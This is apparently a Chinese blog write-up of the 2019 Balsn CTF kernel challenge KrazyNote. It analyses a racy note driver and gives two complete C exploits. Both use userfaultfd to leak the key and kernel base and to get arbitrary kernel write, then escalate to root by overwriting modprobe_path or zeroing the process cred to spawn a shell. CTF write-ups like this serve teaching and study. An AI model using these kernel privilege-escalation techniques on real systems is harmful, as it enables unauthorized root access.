[userfaultfd] 2019-BalsnCTF_KrazyNote

已于 2024-01-17 18:03:46 修改
阅读量131 收藏
点赞数
分类专栏: # kernel-pwn 文章标签: kernel pwn userfaultfd
于 2023-11-21 20:56:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/134540209
版权

前言

题目不算难, 但是这代码逆向可逆死个人:) 悲悲悲

程序分析

内核版本: v5.1.9

保护: 开了 kaslr, smep, smap. 现在的题目基本都开了, 都不用看.

其中 note 模块中注册了一个 misc 设备, 其函数表中就只有 note_open 和 note_unlocked_ioctl 两个函数, 其中 note_open 函数没啥用. 主要看看 note_unlocked_ioctl 函数吧. 

这里用的是 unlocked_ioctl 而不是 ioctl, 看网上说 unlocked_ioctl 不会提供锁操作, 需要用户自己实现相关锁操作

行, 来看看 note_unlocked_ioctl 函数吧:) 是不是一脸懵逼, 这只是其中一部分

 可能是代码优化的问题, 反正 IDA 的伪 C 代码死难看. 所以这里采用动调的方式去理清楚整个程序的功能.

动调就不一步一步展示了, 最后我整理的结果如下, 就是简单的写了下这个函数的逻辑. 整个过程都没有上锁.

// 用户程序传入的结构体
struct user_note {
	size_t idx;
	size_t size;
	char* buf;
};
//  chunk 结构体
// 感觉就是在模仿 glibc
struct chunk {
	size_t key;
	size_t data_size;
	size_t data_offset;
	char data[]; //char data[self.data_size];
};

#define ADD  0xFFFFFF00
#define DELE 0xFFFFFF03
#define EDIT 0xFFFFFF01
#define SHOW 0xFFFFFF02
// 调试得知 KEY 与 page_offset_base 存在一个不固定的偏移
#define KEY
#define CHUNK_HEADER_SIZE 0x18

size_t page_offset_base;
// note_arr, chunk_buf, current_chunk_ptr 为 BSS 段上的变量
struct chunk* note_arr[16];
char* current_chunk_ptr = chunk_buf;
char chunk_buf[0x2000];

// 默认 idx 在 [0, 15] 之间
// size 在 [0, 0x100] 之间
// 这里实际上要复杂一些, 因为 chunk 的大小没有对齐
__int64 note_unlocked_ioctl(struct file* fp, unsigend int cmd, unsigned __int64 args)
{
	struct user_note user_note;
	struct chunk* knote;
	size_t buf[32];
	if (copy_from_user(&user_note, args, 24)) return -14;
	
	switch (cmd)
	{

		case ADD:
			size_t add_size = LOBYTE(user_note->size);
			size_t idx = -1;
			// 获取堆块索引, 最多申请16个
			for (;idx < 16; idx++)
				if (!note_addr[idx])
					break;
			if (idx == 16) goto ERROR;
			// 设置堆块元数据
			note_arr[idx] = current_chunk_ptr;	
			current_chunk_ptr = current_chunk_ptr + add_size + CHUNK_HEADER_SIZE;
			note_arr[idx].key = KEY;
			note_arr[idx].data_size = add_size;
			// 复制数据到内核空间
			copy_from_user(buf, user_note.buf, add_size);
			// 数据进行异或加密
			xor_key(buf, KEY);
			// 复制数据到堆块中
			qmemcpy(note_arr[idx].data, buf, add_size);
			note_arr[idx].data_offset = note_arr[idx] - page_offset_base;
			break;

		case SHOW:
			size_t idx = user_note.idx & 0xf;
			size_t size = LOBYTE(note_arr[idx].size);
			// 获取堆块数据域起始地址
			size_t data_addr = note_arr[idx].data_offset + page_offset_base;
			qmemcpy(buf, data_addr, size);
			// 数据异或解密
			xor_key(buf, KEY);
			// 复制数据到用户空间
			copy_to_user(user_note.buf, buf, size); 
			break;

		case EDIT:
			// 获取堆块
			knote = note_arr[LOBYTE(user_note.idx)];
			if (knote)
			{
				size_t size = LOBYTE(knote->size);
				size_t data_addr = page_offset_base + knote->data_offset;
				// 复制数据到内核空间
				copy_from_user(buf, user_note.buf, size);
				// 数据加密
				xor_key(buf, KEY);
				// 复制数据到堆块中
				qmemcpy(data_addr, buf, size);
			}
			break;
	
		case DELE:
			// 删除所有堆块
			// 将 note_arr 清空
			for (int i = 0; i < 16; i++) note_arr[i] = NULL;
			// 重置分配堆块指针
			current_chunk_ptr = chunk_buf;
			// 清空堆区的所以数据
			memset(chunk_buf, 0, 0x2000);
			break;
	}
	return 0;
ERROR:
	return -14
}

总的来说, 题目实现了一个菜单 "堆", 具有增/删/查/改的功能, 但是这里的 "堆" 是出题者自己模拟的, 即:

1) 在 BSS 段上分配一块内存 bss_buf 作为堆

2) current_chunk_ptr 作为堆指针, 指向堆目前的地址, 类似 glibc 中的 top_chunk

3) 定义了一个 chunk 结构, 类似 glibc 中的 chunk 都包含一个 0x10 的头一样. 这里的头为 0x18, 字段分别为 key, data_size, data_offset, 其函数如下:

        1) chunk 中的数据都会跟 key 进行异或

        2) data_size 表示数据域的大小

        3) page_offset_base + data_offset 为数据域的起始地址

注意:

1, 这里的 data_size 可以为0, 这时候只分配一个chunk头.

2, 这里的 data_size 并不是对齐的, 也就是说你可以分配大小为 1 字节的堆块, 这是堆块的总大小就为 0x19, 下次分配就会从 0x20 开始. 但是这个没啥用, 我们自己在进行在分配的时候还是 8 字节对齐分配, 因为不想自找麻烦:)

3, 注意一下 dele 堆块, 上面代码写的很清楚了, 自己看吧

漏洞分析与利用

漏洞就在于其没有进行锁操作, 并且内核版本为 5.1.9, 在 add/edit 的时候利用了 copy_from_user, 所以就是常规的 userfaultfd 利用了.

任意写打 modprobe_path

其实上面已经写的很清楚了, 代码逻辑也写了, 先把 key 泄漏出来, 然后泄漏 kernel_base, 最后修改 data_offset 实现任意地址写.

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>

size_t key;
size_t kernel_offset;
size_t modprobe_path_offset;

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

int fd;
struct note {
        size_t idx;
        size_t size;
        char* buf;
};

void add(size_t size, char* buf)
{
        struct note n = { .idx = 0, .size = size, .buf = buf };
        ioctl(fd, 0xFFFFFF00, &n);
}

void edit(size_t idx, char* buf)
{
        struct note n = { .idx = idx, .size = 0, .buf = buf };
        ioctl(fd, 0xFFFFFF01, &n);
}

void show(size_t idx, char* buf)
{
        struct note n = { .idx = idx, .size = 0, .buf = buf };
        ioctl(fd, 0xFFFFFF02, &n);
}

void dele()
{
        struct note n = { .idx = 0, .size = 0, .buf = NULL };
        ioctl(fd, 0xFFFFFF03, &n);
}

void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
        long uffd;
        struct uffdio_api uffdio_api;
        struct uffdio_register uffdio_register;

        uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
        if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);

        uffdio_api.api = UFFD_API;
        uffdio_api.features = 0;
        if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);

        uffdio_register.range.start = (long long)addr;
        uffdio_register.range.len = len;
        uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) puts("[X] ioctl-UFFDIO_REGISTER"), exit(-1);

        if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
                puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}

char copy_src[0x1000] = { 0 };
void* leak_key(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler to leak key");
                char buf[0x100] = { 0 };
                dele();
                add(0, buf);
                add(0, buf);

                *(uint64_t*)(copy_src) = 0;
                *(uint64_t*)(copy_src+8) = 0xff;

                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}

void* leak_kernel(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler to leak kernel base");
                char buf[0x100] = { 0 };
                dele();
                add(0x18, buf);
                add(0x18, buf);
                memset(copy_src, 0, sizeof(copy_src));
                *(uint64_t*)(copy_src+0x18) = key;
                *(uint64_t*)(copy_src+0x18+8) = 0x18 ^ key;
                *(uint64_t*)(copy_src+0x18+8+8) = 0x9d000 ^ key;

                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}

void* hijack(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler to hijack modprobe_path");
                char buf[0x100] = { 0 };
                dele();
                add(0x18, buf);
                add(0x18, buf);
                memset(copy_src, 0, sizeof(copy_src));
                *(uint64_t*)(copy_src+0x18) = key;
                *(uint64_t*)(copy_src+0x18+8) = 0x10 ^ key;
                *(uint64_t*)(copy_src+0x18+8+8) = modprobe_path_offset ^ key;

                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}

void get_flag(){
        system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /home/note/x"); // modeprobe_path 修改为了 /tmp/x
        system("chmod +x /home/note/x");
        system("echo -ne '\\xff\\xff\\xff\\xff' > /home/note/dummy"); // 非法格式的二进制文件
        system("chmod +x /home/note//dummy");
        system("/home/note/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 执行的文件 /tmp/x
        sleep(0.3);
        system("cat /flag");
        exit(0);
}

int main(int argc, char** argv, char** envp)
{
        char buf[0x1000] = { 0 };

        fd = open("/dev/note", O_RDONLY);
        if (fd < 0) err_exit("FAILED to open dev file");

        pthread_t thr0, thr1, thr2;
        void* uffd_buf0 = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
        void* uffd_buf1 = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
        void* uffd_buf2 = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
        if (uffd_buf0 < 0) err_exit("FAILED to mmap for uffd");
        if (uffd_buf1 < 0) err_exit("FAILED to mmap for uffd");
        if (uffd_buf2 < 0) err_exit("FAILED to mmap for uffd");
        register_userfaultfd(&thr0, uffd_buf0, 0x1000, leak_key);
        register_userfaultfd(&thr1, uffd_buf1, 0x1000, leak_kernel);
        register_userfaultfd(&thr2, uffd_buf2, 0x1000, hijack);

        add(0x10, uffd_buf0);
        show(1, buf);
        key = *(uint64_t*)buf;
        binary_dump("Leak key data", buf, 0x100);
        hexx("key value", key);

        memset(buf, 0, sizeof(buf));
        dele();
        add(0x18+0x18, buf);
        edit(0, uffd_buf1);
        show(1, buf);
        kernel_offset = *(uint64_t*)buf - 0xffffffff81000030;
        binary_dump("Leak kernel_base data", buf, 0x18);
        hexx("kernel_offset", kernel_offset);

        size_t modprobe_path = 0xffffffff8205e0e0 + kernel_offset;
        size_t page_offset_base = key & 0xfffffffff0000000;
        modprobe_path_offset = modprobe_path - page_offset_base;
        hexx("modprobe", modprobe_path);
        hexx("Guess page_offset_base", page_offset_base);
        hexx("modprobe_path_offset", modprobe_path_offset);

        memset(buf, 0, sizeof(buf));
        dele();
        add(0x18+0x18, buf);
        edit(0, uffd_buf2);
        strcpy(buf, "/home/note/x");
        edit(1, buf);
        puts("[+] get flag");
        get_flag();

        return 0;
}

效果如下:

任意写修改 cred

这里我们存在任意读写的能力, 所有根本不需要泄漏 kernel_base, 直接在泄漏 key 后得到 page_offset_base, 然后遍历搜索 current task_struct, 然后找到 current_cred, 最后利用任意写修改 cred 进行提权.

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <sys/prctl.h>

size_t key;
size_t kernel_offset;

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

int fd;
struct note {
        size_t idx;
        size_t size;
        char* buf;
};

void add(size_t size, char* buf)
{
        struct note n = { .idx = 0, .size = size, .buf = buf };
        ioctl(fd, 0xFFFFFF00, &n);
}

void edit(size_t idx, char* buf)
{
        struct note n = { .idx = idx, .size = 0, .buf = buf };
        ioctl(fd, 0xFFFFFF01, &n);
}

void show(size_t idx, char* buf)
{
        struct note n = { .idx = idx, .size = 0, .buf = buf };
        ioctl(fd, 0xFFFFFF02, &n);
}

void dele()
{
        struct note n = { .idx = 0, .size = 0, .buf = NULL };
        ioctl(fd, 0xFFFFFF03, &n);
}

void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
        long uffd;
        struct uffdio_api uffdio_api;
        struct uffdio_register uffdio_register;

        uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
        if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);

        uffdio_api.api = UFFD_API;
        uffdio_api.features = 0;
        if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);

        uffdio_register.range.start = (long long)addr;
        uffdio_register.range.len = len;
        uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) puts("[X] ioctl-UFFDIO_REGISTER"), exit(-1);

        if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
                puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}

char copy_src[0x1000] = { 0 };
void* handler(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler");
                char buf[0x100] = { 0 };
                dele();
                add(0, buf);
                add(0, buf);

                *(uint64_t*)(copy_src) = 0;
                *(uint64_t*)(copy_src+8) = 0x18;

                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}

int main(int argc, char** argv, char** envp)
{
        char buf[0x100] = { 0 };
        char buffer[0x300] = { 0 };
        fd = open("/dev/note", O_RDONLY);
        if (fd < 0) err_exit("FAILED to open dev file");

        if (prctl(PR_SET_NAME, "Pwner-XiaozaYa") < 0) err_exit("SET NAME");

        pthread_t thr;
        void* uffd_buf = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
        if (uffd_buf < 0) err_exit("FAILED to mmap for uffd");
        register_userfaultfd(&thr, uffd_buf, 0x1000, handler);

        add(0x10, uffd_buf);
        show(1, buf);
        key = *(uint64_t*)buf;
        binary_dump("Leak key data", buf, 0x18);
        hexx("key value", key);

        size_t page_offset_base = key & 0xfffffffff0000000;
        hexx("Guess page_offset_base", page_offset_base);

        memset(buf, 0, sizeof(buf));
        add(0, buf);

        *(uint64_t*)buf = 0 ^ key;
        *(uint64_t*)(buf + 8) = 0xff ^ key;
        uint64_t* task;
        for (size_t off = 0; ; off+=0x100)
        {
                *(uint64_t*)(buf + 8 + 8) = off ^ key;
                edit(1, buf);
                memset(buffer, 0, sizeof(buffer));
                show(2, buffer+0x100);
                task = (uint64_t*)memmem(buffer+0x100, 0x100, "Pwner-XiaozaYa", 14);
                if (task)
                {
                        printf("[+] comm: %s, real_cred: %#lx, current_cred: %#lx\n", task, task[-1], task[-2]);
                        if (task[-1] > 0xffff000000000000 && task[-2] > 0xffff000000000000) break;
                }
        }

        *(uint64_t*)(buf + 8) = 0x20 ^ key;
        *(uint64_t*)(buf + 8 + 8) = (task[-2] + 4 - page_offset_base) ^ key;
        edit(1, buf);
        memset(buf, 0, sizeof(buf));
        edit(2, buf);
        puts("[+] Get root shell");
        system("/bin/sh");

        return 0;
}

 效果如下: 因为每次最多只能读0x100, 所以寻找 current_task_struct 的时间可能久一些

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
umcache:使用userfaultfd的用户模式缓存
02-15
**umcache:使用userfaultfd的用户模式缓存** `umcache`是一个利用Linux内核提供的`userfaultfd`机制实现的用户空间缓存库。`userfaultfd`是Linux内核提供的一种机制,允许用户空间程序在访问未映射的内存区域时...
008.利用堆大小差一错误爆破Linux内核-008.CVE-2016-6187 Exploiting Linux kernel
08-04
在实际的漏洞利用过程中,`userfaultfd()`系统调用可能被用来检测和控制异常内存访问,它允许用户空间程序参与到内核的页故障处理中,这使得攻击者有可能进一步操控内存。 总结来说,CVE-2016-6187是一个由于边界...
criu:CheckpointRestore工具
02-04
CRIU-一个为Linux实现检查点/恢复功能的项目CRIU(代表用户空间中的检查点和还原)是用于检查点/还原Linux任务的实用程序。 使用此工具,您可以冻结一个正在运行的应用程序(或其一部分),并将其作为文件集合检查点...
linux-support:一组Rust板条箱,可简化与Linux互操作的过程
02-09
是一个Rust板条箱,用于全面Linux支持,用于命名空间,cgroup,进程,调度,解析/proc和/sys的大量文件,信号,超线程,CPUS,NUMA节点,io-uring,io调度优先级,不寻常的文件描述符(包括pid描述符和userfaultfd)...
Linux内核内存管理技术分享
08-27
该技术涉及到计算机体系结构、MMU、Cache、DMA、EPT、虚拟地址空间布局、伙伴系统、SLAB、用户空间地址布局、匿名页和文件页、缺页异常、反向映射、内存规整、OOM、KSM、巨型页、Userfaultfd等方面。 hardware和...
Arcmap天地图历史影像插件全国版-免费!免费!
07-22
2024版“天地图”首次开放多时相影像专题,公众可查看32个省级天地图节点近半个世纪的历史影像;本arcmap插件集成了全国天地图历史影像接口,累计上千期。 免费使用。不收费!!不收费!!不收费!!
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包
07-22
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 通过网上交易这个平台,我们足不出户就可以了解商品的信息和价格,不仅方便了用户也为用户节约了时间,系统的主要功能就是:商品类别管理、商品信息管理、订单管理、会员管理、系统公告管理等。分为管理员用户、会员用户这二种用户平台。 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程(在说明文档中)
mysql安装配置教程
07-22
MySQL的安装和配置过程可能因操作系统和版本而异,但以下是一些通用的步骤,适用于大多数情况: ### Windows系统安装MySQL: 1. **下载MySQL Installer**: - 访问[MySQL官方网站](https://dev.mysql.com/downloads/installer/)下载MySQL Installer。 2. **启动MySQL Installer**: - 运行下载的安装程序。 3. **选择安装类型**: - 选择“Developer Default”安装类型,它包括MySQL Server和常用的开发工具。 4. **配置MySQL Server**: - 在“Server Instance Configuration”中,输入root用户的密码,并配置MySQL的安装路径。 5. **详细配置**: - 根据需要配置MySQL Server的详细设置,如字符集、默认存储引擎等。 6. **安装**: - 检查配置,然后点击“Execute”开始安装。 7. **安装完成**: -
文化娱乐-微博情感分析-含实验报告-约150行(分词、朴素贝叶斯模型).rar
07-22
数据可视化实例的python实现,可供学习了解
微信小程序+外卖小程序
07-22
微信小程序是一种不需要下载安装即可使用的应用,它实现了应用“触手可及”的梦想,用户扫一扫或搜一下即可打开应用,体现了“用完即走”的理念。 特点: 无需安装和卸载:用户可以直接使用,使用完直接关闭,不会占用桌面空间。 制作成本低:小程序开发门槛相对较低,难度不及APP,能够满足简单的基础应用需求。 内存小、运行快:小程序体积小,加载速度快,操作便利快捷。 容易部署,延展性强:小程序具有丰富的延展性,可以适应多种应用场景。
mysql安装配置教程.docx
最新发布
07-22
mysql安装配置教程
Qt5.12制作的库存管理系统
07-22
基于Qt512开发的商品库存管理系统,利用MySql构建库存管理数据库,设置有商品编号、名称、数量、单价、采购单位、负责人、入库时间、出库时间、备注的记录,使用ODBC数据源连接MySQL,在QT中编写程序,并制作了仓库管理系统的UI界面,利用QT设计师界面构建子界面,完成新增商品、商品入库、商品出库、删除商品、搜索商品、导出数据、商品汇总的功能,实现数据库与UI数据展示等同步。
跑步运动微信小程序.zip
07-22
跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。
河道水面漂浮物视频数据集05
07-22
河道漂浮物数据集05,通过自己采集提供给大家使用,注意本数据集未标注。
洛谷+Hydro美化插件
07-22
洛谷 | 计算机科学教育新生态 + Hydro Online Judge两大在线系统 Chrome-based 浏览器插件。
无水印视频素材,可以用于剪辑,制作PPT等办公场景,唯美系列2个,星空系列1个,夜景系列1个,其他系列29个.rar
07-22
探索无限创意,用我们的无水印视频素材点亮您的作品!精选02款唯美系列视频,让您的剪辑更添艺术气息;1款星空系列,带您遨游浩瀚宇宙;1款夜景系列,捕捉城市之美;还有29款其他系列,满足您多样化的创作需求。这些高清素材,无论是用于专业剪辑还是制作精美的PPT,都能助您一臂之力,提升工作效率与视觉效果。无需担心版权问题,我们的素材纯净无痕,让您的创意自由飞翔。现在就加入我们,开启您的创意之旅,用这些高品质视频素材,打造独具匠心的作品吧!
点亮Delphi GUI开发:构建桌面应用的艺术
07-22
Delphi是一种高性能的集成开发环境(IDE)和面向对象的编程语言。它最初由Borland公司开发,后来随着Borland公司的变迁,Delphi的开发和维护权转交给了Embarcadero Technologies。Delphi主要使用Object Pascal语言,这是一种扩展的Pascal语言,增加了面向对象编程的特性。 ### 主要特点 1. **面向对象**:Delphi使用Object Pascal,支持类、对象、继承、封装和多态等面向对象编程特性。 2. **快速应用开发**:Delphi提供了丰富的VCL(Visual Component Library)组件库,使得开发者可以快速构建复杂的图形用户界面(GUI)。 3. **跨平台**:Delphi支持Windows、macOS和Linux等多个平台的开发。 4. **强大的数据库支持**:Delphi提供了对各种数据库的访问支持,包括SQL Server、Oracle、MySQL等。 5. **网络编程**:Delphi支持网络编程,可以开发客户端和服务器端的应用程序。 6. **安全性**:Delphi应用程
PP88-V5 (13).apk
07-22
PP88-V5 (13).apk
sklearn波士顿数据集
07-22
波士顿房价数据集是机器学习中非常知名的数据集,它被用于多篇回归算法研究的学术论文中,该数据集共计506条,其中包含有13个与房价相关的特征以及1个目标值(房价) 数据集读取教学 https://mp.csdn.net/mp_blog/creation/editor/140621359 CRIM per capita crime rate by town ZN proportion of residential land zoned for lots over 25,000 sq.ft. INDUS proportion of non-retail business acres per town CHAS Charles River dummy variable (= 1 if tract bounds river; 0 otherwise) NOX nitric oxides concentration (parts per 10 million) RM average number of rooms per AGE proportion of owner-occu
termux怎么调整容器配置以禁用no new privilege
05-10
要禁用no new privilege,你需要在启动Termux的容器时调整其配置。你可以按照以下步骤进行... kernel.unprivileged_userfaultfd=1 ``` 6. 保存文件并退出容器。 现在你已经成功配置了容器以禁用no new privilege。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值